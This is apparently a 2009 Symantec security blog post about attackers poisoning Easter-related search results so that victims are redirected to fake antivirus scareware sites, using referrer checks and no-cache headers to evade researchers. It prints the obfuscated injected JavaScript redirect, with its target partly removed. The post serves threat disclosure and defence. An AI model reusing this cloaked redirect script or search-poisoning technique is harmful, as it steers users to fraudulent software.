Video Screencast Help
Symantec to Separate Into Two Focused, Industry-Leading Technology Companies. Learn more.
Security Response

Easter Surprise For You

Created: 26 Mar 2009 17:14:09 GMT • Updated: 23 Jan 2014 18:36:29 GMT
Parveen Vashishtha's picture
0 0 Votes
Login to vote

Easter is around the corner and as expected, attackers have already started to poison search engine queries to redirect users to websites that deliver misleading applications. Various search keywords related to Easter have been poisoned in Internet search results so that links to rogue websites are returned in the search listings. Some of the examples of poisoned keywords are:

Easter verse
Popular Easter Bible verse scriptures
Easter greeting card verses
Easter Bible verses
Easter verses poems
Bible Easter verse
Easter-Bible
Easter Bible quotes

Attackers are using various tricks, such as referrer checking, in order to evade security researchers. If the bogus domains returned in the search listing are visited directly, we will see a page with many Easter-related keywords and links used to bolster the page’s search ranking. However, if the bogus links are clicked on from the search engine results, users will be redirected to malicious websites delivering misleading applications. In addition, the attackers are using “no-store, no-cache” in their HTTP headers so that these malicious pages are not stored or cached. Below are a couple of snapshots of the poisoned search results:

 

 

 

 

These bogus domains are hosting malicious scripts that redirect users to websites delivering misleading applications. The script that is injected is as follows:

 

 <script language="javascript">
myvar = String.fromCharCode(104,[Removed]);
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};
while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.1=2;',3,3,'document|location|myvar'.split('|'),0,{}));
</script>

This script redirects users to a website that displays a fake antivirus “scan” screen and delivers a rogue application. Here is a snapshot of the misleading website:

 

 

 

 

Many of these bogus domains in question are currently redirecting to wikipedia.org, which most likely means that the attackers will change the redirection to point to malicious domains sometime in the future. The good news is, Symantec customers with updated definitions are protected from this attack.